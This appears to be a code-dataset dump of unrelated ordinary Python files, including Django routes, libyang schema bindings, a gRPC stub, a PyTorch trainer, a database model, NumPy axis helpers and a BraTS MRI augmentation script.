content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
def extract_json(html):
|
python
|
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE
from __future__ import absolute_import
from awkward._ext import fromjson
from awkward._ext import uproot_issue_90
|
python
|
from django.urls import path
#from account.forms import LoginForm
from django.views.generic.base import TemplateView # new
from . import views
app_name = 'home'
urlpatterns = [
#ex: /roster/
path('', views.index, name='index'),
path('coachhome/<int:pk>', views.coachhome.as_view(template_name='coachhome.html'), name='coachhome'),
path('coachhome/1',views.coachhome.as_view(template_name='coachhome.html')),
path('coachhome/2',views.coachhome.as_view(template_name='coachhome.html')),
path('coachhome/3',views.coachhome.as_view(template_name='coachhome.html')), # ne
path('coachhome/subs',views.coachhome.as_view(template_name='coachhome.html')),
path('coachhome/shot',views.coachhome.as_view(template_name = 'coachhome.html')),
path('coachhome/stat',views.coachhome.as_view(template_name='coachhome.html')),
path('coachhome/event', views.statEvent, name='statEvent'),
path('coachhome/analytics/<int:pk>', views.analytics.as_view(template_name= 'analytics.html'), name='analytics'),
]
|
python
|
# Copyright (c) 2018-2019 Robin Jarry
# SPDX-License-Identifier: BSD-3-Clause
from _libyang import ffi
from _libyang import lib
from .util import c2str
from .util import str2c
#------------------------------------------------------------------------------
def schema_in_format(fmt_string):
if fmt_string == 'yang':
return lib.LYS_IN_YANG
if fmt_string == 'yin':
return lib.LYS_IN_YIN
raise ValueError('unknown schema input format: %r' % fmt_string)
#------------------------------------------------------------------------------
def schema_out_format(fmt_string):
if fmt_string == 'yang':
return lib.LYS_OUT_YANG
if fmt_string == 'yin':
return lib.LYS_OUT_YIN
if fmt_string == 'tree':
return lib.LYS_OUT_TREE
if fmt_string == 'info':
return lib.LYS_OUT_INFO
if fmt_string == 'json':
return lib.LYS_OUT_JSON
raise ValueError('unknown schema output format: %r' % fmt_string)
#------------------------------------------------------------------------------
class Module:
def __init__(self, context, module_p):
self.context = context
self._module = module_p
def name(self):
return c2str(self._module.name)
def prefix(self):
return c2str(self._module.prefix)
def description(self):
return c2str(self._module.dsc)
def filepath(self):
return c2str(self._module.filepath)
def implemented(self):
return bool(lib.lypy_module_implemented(self._module))
def feature_enable(self, name):
ret = lib.lys_features_enable(self._module, str2c(name))
if ret != 0:
raise self.context.error('no such feature: %r' % name)
def feature_enable_all(self):
self.feature_enable('*')
def feature_disable(self, name):
ret = lib.lys_features_disable(self._module, str2c(name))
if ret != 0:
raise self.context.error('no such feature: %r' % name)
def feature_disable_all(self):
self.feature_disable('*')
def feature_state(self, name):
ret = lib.lys_features_state(self._module, str2c(name))
if ret < 0:
raise self.context.error('no such feature: %r' % name)
return bool(ret)
def features(self):
for i in range(self._module.features_size):
yield Feature(self.context, self._module.features[i])
def get_feature(self, name):
for f in self.features():
if f.name() == name:
return f
raise self.context.error('no such feature: %r' % name)
def revisions(self):
for i in range(self._module.rev_size):
yield Revision(self.context, self._module.rev[i])
def __iter__(self):
return self.children()
def children(self, types=None):
return iter_children(self.context, self._module, types=types)
def __str__(self):
return self.name()
def print_mem(self, fmt='tree', path=None):
fmt = schema_out_format(fmt)
buf = ffi.new('char **')
ret = lib.lys_print_mem(buf, self._module, fmt, str2c(path), 0, 0)
if ret != 0:
raise self.context.error('cannot print module')
try:
return c2str(buf[0])
finally:
lib.free(buf[0])
def print_file(self, fileobj, fmt='tree', path=None):
fmt = schema_out_format(fmt)
ret = lib.lys_print_fd(
fileobj.fileno(), self._module, fmt, str2c(path), 0, 0)
if ret != 0:
raise self.context.error('cannot print module')
def parse_data_dict(self, dic, parent=None,
rpc_input=False, rpc_output=False):
"""
Convert a python dictionary to a DNode object following the schema of
this module. The returned value is always a top-level data node (i.e.:
without parent).
:arg dict dic:
The python dictionary to convert.
:arg DNode parent:
Optional parent to update. If not specified a new top-level DNode
will be created.
:arg bool rpc_input:
If True, dic will be parsed by looking in the rpc input nodes.
:arg bool rpc_output:
If True, dic will be parsed by looking in the rpc output nodes.
"""
from .data import dict_to_dnode # circular import
return dict_to_dnode(dic, self, parent=parent,
rpc_input=rpc_input, rpc_output=rpc_output)
#------------------------------------------------------------------------------
class Revision:
def __init__(self, context, rev_p):
self.context = context
self._rev = rev_p
def date(self):
return c2str(self._rev.date)
def description(self):
return c2str(self._rev.dsc)
def reference(self):
return c2str(self._rev.ref)
def extensions(self):
for i in range(self._rev.ext_size):
yield Extension(self.context, self._rev.ext[i])
def get_extension(self, name, prefix=None, arg_value=None):
for ext in self.extensions():
if ext.name() != name:
continue
if prefix is not None and ext.module().name() != prefix:
continue
if arg_value is not None and ext.argument() != arg_value:
continue
return ext
return None
def __repr__(self):
cls = self.__class__
return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self))
def __str__(self):
return self.date()
#------------------------------------------------------------------------------
class Extension:
def __init__(self, context, ext_p):
self.context = context
self._ext = ext_p
self._def = getattr(ext_p, 'def')
def name(self):
return c2str(self._def.name)
def argument(self):
return c2str(self._ext.arg_value)
def module(self):
module_p = lib.lys_main_module(self._def.module)
if not module_p:
raise self.context.error('cannot get module')
return Module(self.context, module_p)
def __repr__(self):
cls = self.__class__
return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self))
def __str__(self):
return self.name()
#------------------------------------------------------------------------------
class Type:
DER = lib.LY_TYPE_DER
BINARY = lib.LY_TYPE_BINARY
BITS = lib.LY_TYPE_BITS
BOOL = lib.LY_TYPE_BOOL
DEC64 = lib.LY_TYPE_DEC64
EMPTY = lib.LY_TYPE_EMPTY
ENUM = lib.LY_TYPE_ENUM
IDENT = lib.LY_TYPE_IDENT
INST = lib.LY_TYPE_INST
LEAFREF = lib.LY_TYPE_LEAFREF
STRING = lib.LY_TYPE_STRING
UNION = lib.LY_TYPE_UNION
INT8 = lib.LY_TYPE_INT8
UINT8 = lib.LY_TYPE_UINT8
INT16 = lib.LY_TYPE_INT16
UINT16 = lib.LY_TYPE_UINT16
INT32 = lib.LY_TYPE_INT32
UINT32 = lib.LY_TYPE_UINT32
INT64 = lib.LY_TYPE_INT64
UINT64 = lib.LY_TYPE_UINT64
BASENAMES = {
DER: 'derived',
BINARY: 'binary',
BITS: 'bits',
BOOL: 'boolean',
DEC64: 'decimal64',
EMPTY: 'empty',
ENUM: 'enumeration',
IDENT: 'identityref',
INST: 'instance-id',
LEAFREF: 'leafref',
STRING: 'string',
UNION: 'union',
INT8: 'int8',
UINT8: 'uint8',
INT16: 'int16',
UINT16: 'uint16',
INT32: 'int32',
UINT32: 'uint32',
INT64: 'int64',
UINT64: 'uint64',
}
def __init__(self, context, type_p):
self.context = context
self._type = type_p
def get_bases(self):
if self._type.base == lib.LY_TYPE_DER:
yield from self.derived_type().get_bases()
elif self._type.base == lib.LY_TYPE_LEAFREF:
yield from self.leafref_type().get_bases()
elif self._type.base == lib.LY_TYPE_UNION:
for t in self.union_types():
yield from t.get_bases()
else: # builtin type
yield self
def name(self):
if self._type.der:
return c2str(self._type.der.name)
return self.basename()
def description(self):
if self._type.der:
return c2str(self._type.der.dsc)
return None
def base(self):
return self._type.base
def bases(self):
for b in self.get_bases():
yield b.base()
def basename(self):
return self.BASENAMES.get(self._type.base, 'unknown')
def basenames(self):
for b in self.get_bases():
yield b.basename()
def derived_type(self):
if not self._type.der:
return None
return Type(self.context, ffi.addressof(self._type.der.type))
def leafref_type(self):
if self._type.base != self.LEAFREF:
return None
lref = self._type.info.lref
return Type(self.context, ffi.addressof(lref.target.type))
def union_types(self):
if self._type.base != self.UNION:
return
t = self._type
while t.info.uni.count == 0:
t = ffi.addressof(t.der.type)
for i in range(t.info.uni.count):
yield Type(self.context, t.info.uni.types[i])
def enums(self):
if self._type.base != self.ENUM:
return
t = self._type
while t.info.enums.count == 0:
t = ffi.addressof(t.der.type)
for i in range(t.info.enums.count):
e = t.info.enums.enm[i]
yield c2str(e.name), c2str(e.dsc)
def all_enums(self):
for b in self.get_bases():
yield from b.enums()
def bits(self):
if self._type.base != self.BITS:
return
t = self._type
while t.info.bits.count == 0:
t = ffi.addressof(t.der.type)
for i in range(t.info.bits.count):
b = t.info.bits.bit[i]
yield c2str(b.name), c2str(b.dsc)
def all_bits(self):
for b in self.get_bases():
yield from b.bits()
NUM_TYPES = frozenset(
(INT8, INT16, INT32, INT64, UINT8, UINT16, UINT32, UINT64))
def range(self):
if self._type.base in self.NUM_TYPES and self._type.info.num.range:
return c2str(self._type.info.num.range.expr)
elif self._type.base == self.DEC64 and self._type.info.dec64.range:
return c2str(self._type.info.dec64.range.expr)
elif self._type.der:
return self.derived_type().range()
return None
def all_ranges(self):
if self._type.base == lib.LY_TYPE_UNION:
for t in self.union_types():
yield from t.all_ranges()
else:
rng = self.range()
if rng is not None:
yield rng
def length(self):
if self._type.base == self.STRING and self._type.info.str.length:
return c2str(self._type.info.str.length.expr)
elif self._type.base == self.BINARY and self._type.info.binary.length:
return c2str(self._type.info.binary.length.expr)
elif self._type.der:
return self.derived_type().length()
return None
def all_lengths(self):
if self._type.base == lib.LY_TYPE_UNION:
for t in self.union_types():
yield from t.all_lengths()
else:
length = self.length()
if length is not None:
yield length
def patterns(self):
if self._type.base != self.STRING:
return
for i in range(self._type.info.str.pat_count):
p = self._type.info.str.patterns[i]
if not p:
continue
# in case of pattern restriction, the first byte has a special
# meaning: 0x06 (ACK) for regular match and 0x15 (NACK) for
# invert-match
invert_match = p.expr[0] == 0x15
# yield tuples like:
# ('[a-zA-Z_][a-zA-Z0-9\-_.]*', False)
# ('[xX][mM][lL].*', True)
yield c2str(p.expr + 1), invert_match
if self._type.der:
yield from self.derived_type().patterns()
def all_patterns(self):
if self._type.base == lib.LY_TYPE_UNION:
for t in self.union_types():
yield from t.all_patterns()
else:
yield from self.patterns()
def module(self):
module_p = lib.lys_main_module(self._type.der.module)
if not module_p:
raise self.context.error('cannot get module')
return Module(self.context, module_p)
def extensions(self):
for i in range(self._type.ext_size):
yield Extension(self.context, self._type.ext[i])
if self._type.parent:
for i in range(self._type.parent.ext_size):
yield Extension(self.context, self._type.parent.ext[i])
def get_extension(self, name, prefix=None, arg_value=None):
for ext in self.extensions():
if ext.name() != name:
continue
if prefix is not None and ext.module().name() != prefix:
continue
if arg_value is not None and ext.argument() != arg_value:
continue
return ext
return None
def __repr__(self):
cls = self.__class__
return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self))
def __str__(self):
return self.name()
#------------------------------------------------------------------------------
class Feature:
def __init__(self, context, feature_p):
self.context = context
self._feature = feature_p
def name(self):
return c2str(self._feature.name)
def description(self):
return c2str(self._feature.dsc)
def reference(self):
return c2str(self._feature.ref)
def state(self):
return bool(self._feature.flags & lib.LYS_FENABLED)
def deprecated(self):
return bool(self._feature.flags & lib.LYS_STATUS_DEPRC)
def obsolete(self):
return bool(self._feature.flags & lib.LYS_STATUS_OBSLT)
def if_features(self):
for i in range(self._feature.iffeature_size):
yield IfFeatureExpr(self.context, self._feature.iffeature[i])
def module(self):
module_p = lib.lys_main_module(self._feature.module)
if not module_p:
raise self.context.error('cannot get module')
return Module(self.context, module_p)
def __str__(self):
return self.name()
#------------------------------------------------------------------------------
class IfFeatureExpr:
def __init__(self, context, iffeature_p):
self.context = context
self._iffeature = iffeature_p
def _get_operator(self, position):
# the ->exp field is a 2bit array of operator values stored under
# a uint8_t C array.
mask = 0x3 # 2bits mask
shift = 2 * (position % 4)
item = self._iffeature.expr[position // 4]
result = item & (mask << shift)
return result >> shift
def _operands(self):
op_index = 0
ft_index = 0
expected = 1
while expected > 0:
operator = self._get_operator(op_index)
op_index += 1
if operator == lib.LYS_IFF_F:
yield IfFeature(self.context, self._iffeature.features[ft_index])
ft_index += 1
expected -= 1
elif operator == lib.LYS_IFF_NOT:
yield IfNotFeature
elif operator == lib.LYS_IFF_AND:
yield IfAndFeatures
expected += 1
elif operator == lib.LYS_IFF_OR:
yield IfOrFeatures
expected += 1
def tree(self):
def _tree(operands):
op = next(operands)
if op is IfNotFeature:
return op(self.context, _tree(operands))
elif op in (IfAndFeatures, IfOrFeatures):
return op(self.context, _tree(operands), _tree(operands))
else:
return op
return _tree(self._operands())
def dump(self):
return self.tree().dump()
def __str__(self):
return str(self.tree()).strip('()')
#------------------------------------------------------------------------------
class IfFeatureExprTree:
def dump(self, indent=0):
raise NotImplementedError()
def __str__(self):
raise NotImplementedError()
#------------------------------------------------------------------------------
class IfFeature(IfFeatureExprTree):
def __init__(self, context, feature_p):
self.context = context
self._feature = feature_p
def feature(self):
return Feature(self.context, self._feature)
def dump(self, indent=0):
feat = self.feature()
return '%s%s [%s]\n' % (' ' * indent, feat.name(), feat.description())
def __str__(self):
return self.feature().name()
#------------------------------------------------------------------------------
class IfNotFeature(IfFeatureExprTree):
def __init__(self, context, child):
self.context = context
self.child = child
def dump(self, indent=0):
return ' ' * indent + 'NOT\n' + self.child.dump(indent + 1)
def __str__(self):
return 'NOT %s' % self.child
#------------------------------------------------------------------------------
class IfAndFeatures(IfFeatureExprTree):
def __init__(self, context, a, b):
self.context = context
self.a = a
self.b = b
def dump(self, indent=0):
s = ' ' * indent + 'AND\n'
s += self.a.dump(indent + 1)
s += self.b.dump(indent + 1)
return s
def __str__(self):
return '%s AND %s' % (self.a, self.b)
#------------------------------------------------------------------------------
class IfOrFeatures(IfFeatureExprTree):
def __init__(self, context, a, b):
self.context = context
self.a = a
self.b = b
def dump(self, indent=0):
s = ' ' * indent + 'OR\n'
s += self.a.dump(indent + 1)
s += self.b.dump(indent + 1)
return s
def __str__(self):
return '(%s OR %s)' % (self.a, self.b)
#------------------------------------------------------------------------------
class SNode:
CONTAINER = lib.LYS_CONTAINER
LEAF = lib.LYS_LEAF
LEAFLIST = lib.LYS_LEAFLIST
LIST = lib.LYS_LIST
RPC = lib.LYS_RPC
INPUT = lib.LYS_INPUT
OUTPUT = lib.LYS_OUTPUT
KEYWORDS = {
CONTAINER: 'container',
LEAF: 'leaf',
LEAFLIST: 'leaf-list',
LIST: 'list',
RPC: 'rpc',
INPUT: 'input',
OUTPUT: 'output',
}
def __init__(self, context, node_p):
self.context = context
self._node = node_p
def nodetype(self):
return self._node.nodetype
def keyword(self):
return self.KEYWORDS.get(self._node.nodetype, '???')
def name(self):
return c2str(self._node.name)
def fullname(self):
return '%s:%s' % (self.module().name(), self.name())
def description(self):
return c2str(self._node.dsc)
def config_set(self):
return bool(self._node.flags & lib.LYS_CONFIG_SET)
def config_false(self):
return bool(self._node.flags & lib.LYS_CONFIG_R)
def mandatory(self):
return bool(self._node.flags & lib.LYS_MAND_TRUE)
def deprecated(self):
return bool(self._node.flags & lib.LYS_STATUS_DEPRC)
def obsolete(self):
return bool(self._node.flags & lib.LYS_STATUS_OBSLT)
def status(self):
if self._node.flags & lib.LYS_STATUS_DEPRC:
return 'deprecated'
elif self._node.flags & lib.LYS_STATUS_OBSLT:
return 'obsolete'
return 'current'
def module(self):
module_p = lib.lys_node_module(self._node)
if not module_p:
raise self.context.error('cannot get module')
return Module(self.context, module_p)
def schema_path(self):
try:
s = lib.lys_path(self._node, 0)
return c2str(s)
finally:
lib.free(s)
def data_path(self, key_placeholder="'%s'"):
try:
s = lib.lys_data_path_pattern(self._node, str2c(key_placeholder))
return c2str(s)
finally:
lib.free(s)
def extensions(self):
for i in range(self._node.ext_size):
yield Extension(self.context, self._node.ext[i])
def get_extension(self, name, prefix=None, arg_value=None):
for ext in self.extensions():
if ext.name() != name:
continue
if prefix is not None and ext.module().name() != prefix:
continue
if arg_value is not None and ext.argument() != arg_value:
continue
return ext
return None
def if_features(self):
for i in range(self._node.iffeature_size):
yield IfFeatureExpr(self.context, self._node.iffeature[i])
def parent(self):
parent_p = lib.lys_parent(self._node)
while parent_p and parent_p.nodetype not in SNode.NODETYPE_CLASS:
parent_p = lib.lys_parent(parent_p)
if parent_p:
return SNode.new(self.context, parent_p)
return None
def __repr__(self):
cls = self.__class__
return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self))
def __str__(self):
return self.name()
def parse_data_dict(self, dic, parent=None,
rpc_input=False, rpc_output=False):
"""
Convert a python dictionary to a DNode object following the schema of
this module. The returned value is always a top-level data node (i.e.:
without parent).
:arg dict dic:
The python dictionary to convert.
:arg DNode parent:
Optional parent to update. If not specified a new top-level DNode
will be created.
:arg bool rpc_input:
If True, dic will be parsed by looking in the rpc input nodes.
:arg bool rpc_output:
If True, dic will be parsed by looking in the rpc output nodes.
"""
from .data import dict_to_dnode # circular import
return dict_to_dnode(dic, self, parent=parent,
rpc_input=rpc_input, rpc_output=rpc_output)
NODETYPE_CLASS = {}
@classmethod
def register(cls, nodetype):
def _decorator(nodeclass):
cls.NODETYPE_CLASS[nodetype] = nodeclass
return nodeclass
return _decorator
@classmethod
def new(cls, context, node_p):
nodecls = cls.NODETYPE_CLASS.get(node_p.nodetype, SNode)
return nodecls(context, node_p)
#------------------------------------------------------------------------------
@SNode.register(SNode.LEAF)
class SLeaf(SNode):
def __init__(self, context, node_p):
super().__init__(context, node_p)
self._leaf = ffi.cast('struct lys_node_leaf *', node_p)
def default(self):
return c2str(self._leaf.dflt)
def units(self):
return c2str(self._leaf.units)
def type(self):
return Type(self.context, ffi.addressof(self._leaf.type))
def is_key(self):
if lib.lys_is_key(self._leaf, ffi.NULL):
return True
return False
def must_conditions(self):
for i in range(self._leaf.must_size):
yield c2str(self._leaf.must[i].expr)
def __str__(self):
return '%s %s' % (self.name(), self.type().name())
#------------------------------------------------------------------------------
@SNode.register(SNode.LEAFLIST)
class SLeafList(SNode):
def __init__(self, context, node_p):
super().__init__(context, node_p)
self._leaflist = ffi.cast('struct lys_node_leaflist *', node_p)
def ordered(self):
return bool(self._node.flags & lib.LYS_USERORDERED)
def units(self):
return c2str(self._leaflist.units)
def type(self):
return Type(self.context, ffi.addressof(self._leaflist.type))
def defaults(self):
for i in range(self._leaflist.dflt_size):
yield c2str(self._leaflist.dflt[i])
def must_conditions(self):
for i in range(self._leaflist.must_size):
yield c2str(self._leaflist.must[i].expr)
def __str__(self):
return '%s %s' % (self.name(), self.type().name())
#------------------------------------------------------------------------------
@SNode.register(SNode.CONTAINER)
class SContainer(SNode):
def __init__(self, context, node_p):
super().__init__(context, node_p)
self._container = ffi.cast('struct lys_node_container *', node_p)
def presence(self):
return c2str(self._container.presence)
def must_conditions(self):
for i in range(self._container.must_size):
yield c2str(self._container.must[i].expr)
def __iter__(self):
return self.children()
def children(self, types=None):
return iter_children(self.context, self._node, types=types)
#------------------------------------------------------------------------------
@SNode.register(SNode.LIST)
class SList(SNode):
def __init__(self, context, node_p):
super().__init__(context, node_p)
self._list = ffi.cast('struct lys_node_list *', node_p)
def ordered(self):
return bool(self._node.flags & lib.LYS_USERORDERED)
def __iter__(self):
return self.children()
def children(self, skip_keys=False, types=None):
return iter_children(
self.context, self._node, skip_keys=skip_keys, types=types)
def keys(self):
for i in range(self._list.keys_size):
node = ffi.cast('struct lys_node *', self._list.keys[i])
yield SLeaf(self.context, node)
def must_conditions(self):
for i in range(self._list.must_size):
yield c2str(self._list.must[i].expr)
def __str__(self):
return '%s [%s]' % (
self.name(), ', '.join(k.name() for k in self.keys()))
#------------------------------------------------------------------------------
@SNode.register(SNode.INPUT)
@SNode.register(SNode.OUTPUT)
class SRpcInOut(SNode):
def __iter__(self):
return self.children()
def must_conditions(self):
return ()
def children(self, types=None):
return iter_children(self.context, self._node, types=types)
#------------------------------------------------------------------------------
@SNode.register(SNode.RPC)
class SRpc(SNode):
def must_conditions(self):
return ()
def input(self):
try:
return next(iter_children(
self.context, self._node, types=(self.INPUT,),
options=lib.LYS_GETNEXT_WITHINOUT))
except StopIteration:
return None
def output(self):
try:
return next(iter_children(
self.context, self._node, types=(self.OUTPUT,),
options=lib.LYS_GETNEXT_WITHINOUT))
except StopIteration:
return None
def __iter__(self):
return self.children()
def children(self, types=None):
return iter_children(self.context, self._node, types=types)
#------------------------------------------------------------------------------
def iter_children(context, parent, skip_keys=False, types=None, options=0):
if types is None:
types = (lib.LYS_CONTAINER, lib.LYS_LIST, lib.LYS_RPC,
lib.LYS_LEAF, lib.LYS_LEAFLIST)
def _skip(node):
if node.nodetype not in types:
return True
if not skip_keys:
return False
if node.nodetype != lib.LYS_LEAF:
return False
leaf = ffi.cast('struct lys_node_leaf *', node)
if lib.lys_is_key(leaf, ffi.NULL):
return True
return False
if ffi.typeof(parent) == ffi.typeof('struct lys_module *'):
module = parent
parent = ffi.NULL
else:
module = ffi.NULL
child = lib.lys_getnext(ffi.NULL, parent, module, options)
while child:
if not _skip(child):
yield SNode.new(context, child)
child = lib.lys_getnext(child, parent, module, options)
#------------------------------------------------------------------------------
# compat
Container = SContainer
Leaf = SLeaf
LeafList = SLeafList
List = SList
Node = SNode
Rpc = SRpc
RpcInOut = SRpcInOut
|
python
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.ads.google_ads.v1.proto.resources import language_constant_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_language__constant__pb2
from google.ads.google_ads.v1.proto.services import language_constant_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_language__constant__service__pb2
class LanguageConstantServiceStub(object):
"""Service to fetch language constants.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetLanguageConstant = channel.unary_unary(
'/google.ads.googleads.v1.services.LanguageConstantService/GetLanguageConstant',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_language__constant__service__pb2.GetLanguageConstantRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_language__constant__pb2.LanguageConstant.FromString,
)
class LanguageConstantServiceServicer(object):
"""Service to fetch language constants.
"""
def GetLanguageConstant(self, request, context):
"""Returns the requested language constant.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_LanguageConstantServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetLanguageConstant': grpc.unary_unary_rpc_method_handler(
servicer.GetLanguageConstant,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_language__constant__service__pb2.GetLanguageConstantRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_language__constant__pb2.LanguageConstant.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.LanguageConstantService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
|
python
|
import logging
from torch.utils.tensorboard import SummaryWriter
from utils.utils_common import DataModes
import torch
logger = logging.getLogger(__name__)
class Trainer(object):
def training_step(self, data, epoch):
# Get the minibatch
x, y = data
self.optimizer.zero_grad()
loss, log = self.net.loss(x, y)
loss.backward()
self.optimizer.step()
return log
def __init__(self, net, trainloader, optimizer, epoch_count, eval_every, save_path, evaluator, log_msg):
self.net = net
self.trainloader = trainloader
self.optimizer = optimizer
self.numb_of_epochs = epoch_count
self.eval_every = eval_every
self.save_path = save_path
self.evaluator = evaluator
self.log_msg = log_msg
def train(self):
logger.info("Start training...")
writer = SummaryWriter(self.save_path)
for epoch in range(self.numb_of_epochs): # loop over the dataset multiple times
running_loss = {}
for data in self.trainloader:
# training step
loss = self.training_step(data, epoch)
# print statistics
for key, value in loss.items():
running_loss[key] = (running_loss[key] + value) if key in running_loss else 0
if epoch % self.eval_every == self.eval_every-1: # print every K epochs
logger.info('epoch: {}, tr_loss: {:4f}'.format(epoch, running_loss['loss'] / self.eval_every))
for key, value in running_loss.items():
writer.add_scalar(DataModes.TRAINING + '/' + key, value, epoch)
self.evaluator.evaluate(epoch, writer)
running_loss = 0.0
logger.info("... end of training!")
|
python
|
from datetime import datetime
from . import db, ma
class NRNumber(db.Model):
__tablename__ = 'nr_number'
# core fields
id = db.Column(db.Integer, primary_key=True)
nrNum = db.Column('nr_num', db.String(10), unique=True)
lastUpdate = db.Column('last_update', db.DateTime(timezone=True), default=datetime.utcnow, onupdate=datetime.utcnow)
@classmethod
def get_next_nr_num(cls, last_nr):
last_nr_header = last_nr[0:4]
last_number = last_nr[4:10]
if last_number == '999999':
# next_nr_header = #next letter in the alphabet starting at a specific letter
next_number = '000000'
else:
next_nr_header = last_nr_header
next_number = str((int(last_number) + 1)).zfill(6)
next_nr_num = next_nr_header + next_number
return (next_nr_num)
def json(self):
return {'id': self.id,
'nrNum': self.nrNum
}
def save_to_db(self):
db.session.add(self)
db.session.commit()
class NRNumberSchema(ma.ModelSchema):
class Meta:
model = NRNumber
|
python
|
"""
This module provides some helper methods to deal with multidimensional arrays of different axes order.
"""
import numpy as np
def adjustOrder(volume, inputAxes, outputAxes="txyzc"):
"""
This method allows to convert a given `volume` (with given `inputAxes` ordering)
into a different axis ordering, specified as `outputAxes` string (e.g. "xyzt").
Allowed axes are `t`, `x`, `y`, `z`, `c`.
The default format volumes are converted to is "txyzc", axes that are missing in the input
volume are created with size 1.
"""
assert isinstance(volume, np.ndarray)
assert len(volume.shape) == len(inputAxes)
assert len(outputAxes) >= len(inputAxes)
assert not any(a not in "txyzc" for a in outputAxes)
assert not any(a not in "txyzc" for a in inputAxes)
outVolume = volume
# find present and missing axes
positions = {}
missingAxes = []
for axis in outputAxes:
try:
positions[axis] = inputAxes.index(axis)
except ValueError:
missingAxes.append(axis)
# insert missing axes at the end
for m in missingAxes:
outVolume = np.expand_dims(outVolume, axis=-1)
positions[m] = outVolume.ndim - 1
# transpose
axesRemapping = [positions[a] for a in outputAxes]
outVolume = np.transpose(outVolume, axes=axesRemapping)
return outVolume
def getFrameSlicing(inputAxes, selectValue, selectAxis="t"):
"""
This methods helps to get a slice of a multidimensional array of the specified `inputAxes`,
where only for one specific axis (`selectAxis`) an index (or a list of indices, or a slicing object) is given.
Example: `myarray[getFrameSlicing('xzt', 3, t)]`
Example: `myarray[getFrameSlicing('xzt', [3,7,9], t)]`
"""
assert len(selectAxis) == 1
assert inputAxes.count(selectAxis) == 1
slicing = tuple()
for a in inputAxes:
if a == selectAxis:
slicing += (selectValue,)
else:
slicing += (slice(None),)
return slicing
|
python
|
from keras.models import load_model
from glob import glob
import keras
import numpy as np
from losses import *
import random
from keras.models import Model
from extract_patches import Pipeline
from scipy.misc import imresize
from keras.utils import np_utils
import SimpleITK as sitk
import pdb
import matplotlib.pyplot as plt
import os
from scipy.ndimage.measurements import label
import cv2
from scipy.ndimage.morphology import binary_dilation, generate_binary_structure
import matplotlib.gridspec as gridspec
import imgaug as ia
import imgaug.augmenters as iaa
from imgaug import parameters as iap
# from evaluation_metrics import *
path_HGG = glob('/home/pi/Projects/beyondsegmentation/HGG/**')
path_LGG = glob('/home/pi/Projects/beyondsegmentation/LGG**')
test_path=glob('/home/parth/Interpretable_ML/BraTS_2018/val/**')
np.random.seed(2022)
np.random.shuffle(test_path)
def normalize_scheme(slice_not):
'''
normalizes each slice, excluding gt
subtracts mean and div by std dev for each slice
clips top and bottom one percent of pixel intensities
'''
normed_slices = np.zeros(( 4,155, 240, 240))
for slice_ix in range(4):
normed_slices[slice_ix] = slice_not[slice_ix]
for mode_ix in range(155):
normed_slices[slice_ix][mode_ix] = _normalize(slice_not[slice_ix][mode_ix])
return normed_slices
def _normalize(slice):
b = np.percentile(slice, 99)
t = np.percentile(slice, 1)
slice = np.clip(slice, t, b)
image_nonzero = slice[np.nonzero(slice)]
if np.std(slice)==0 or np.std(image_nonzero) == 0:
return slice
else:
tmp= (slice - np.mean(image_nonzero)) / np.std(image_nonzero)
tmp[tmp==tmp.min()]=-9
return tmp
def load_vol(filepath_image, model_type, slice_):
'''
segment the input volume
INPUT (1) str 'filepath_image': filepath of the volume to predict
(2) bool 'show': True to ,
OUTPUt (1) np array of the predicted volume
(2) np array of the corresping ground truth
'''
#read the volume
flair = glob( filepath_image + '/*_flair.nii.gz')
t2 = glob( filepath_image + '/*_t2.nii.gz')
gt = glob( filepath_image + '/*_seg.nii.gz')
t1s = glob( filepath_image + '/*_t1.nii.gz')
t1c = glob( filepath_image + '/*_t1ce.nii.gz')
t1=[scan for scan in t1s if scan not in t1c]
if (len(flair)+len(t2)+len(gt)+len(t1)+len(t1c))<5:
print("there is a problem here!!! the problem lies in this patient :")
scans_test = [flair[0], t1[0], t1c[0], t2[0], gt[0]]
test_im = [sitk.GetArrayFromImage(sitk.ReadImage(scans_test[i])) for i in range(len(scans_test))]
test_im=np.array(test_im).astype(np.float32)
test_image = test_im[0:4]
gt=test_im[-1]
gt[gt==4]=3
#normalize each slice following the same scheme used for training
test_image = normalize_scheme(test_image)
#transform teh data to channels_last keras format
test_image = test_image.swapaxes(0,1)
test_image=np.transpose(test_image,(0,2,3,1))
test_image, gt = np.array(test_image[slice_]), np.array(gt[slice_])
if model_type == 'dense':
npad = ((8, 8), (8, 8), (0, 0))
test_image = np.pad(test_image, pad_width=npad, mode='constant', constant_values=0)
npad = ((8, 8), (8, 8))
gt = np.pad(gt, pad_width=npad, mode='constant', constant_values=0)
return test_image, gt
class Test_Time_Augmentation():
def __init__(self):
self.aug = iaa.SomeOf(3, [iaa.Affine(
rotate=iap.Normal(0.0, 3),
translate_px=iap.Normal(0.0, 3)),
iaa.AdditiveGaussianNoise(scale=0.3 * np.ptp(test_image) - 9),
iaa.Noop(),
iaa.MotionBlur(k=3, angle = [-2, 2])
], random_order=True)
def predict_aleatoric(self, model, test_image, iterations=1000, dropout=0.5):
predictions = []
for i in range(iterations):
aug_image = aug.augment_images(test_image)
predictions.append(model.predict(aug_image))
predictions = np.array(predictions)
mean = np.mean(predictions, axis = 0)
var = np.var(predictions, axis = 0)
print(mean.shape)
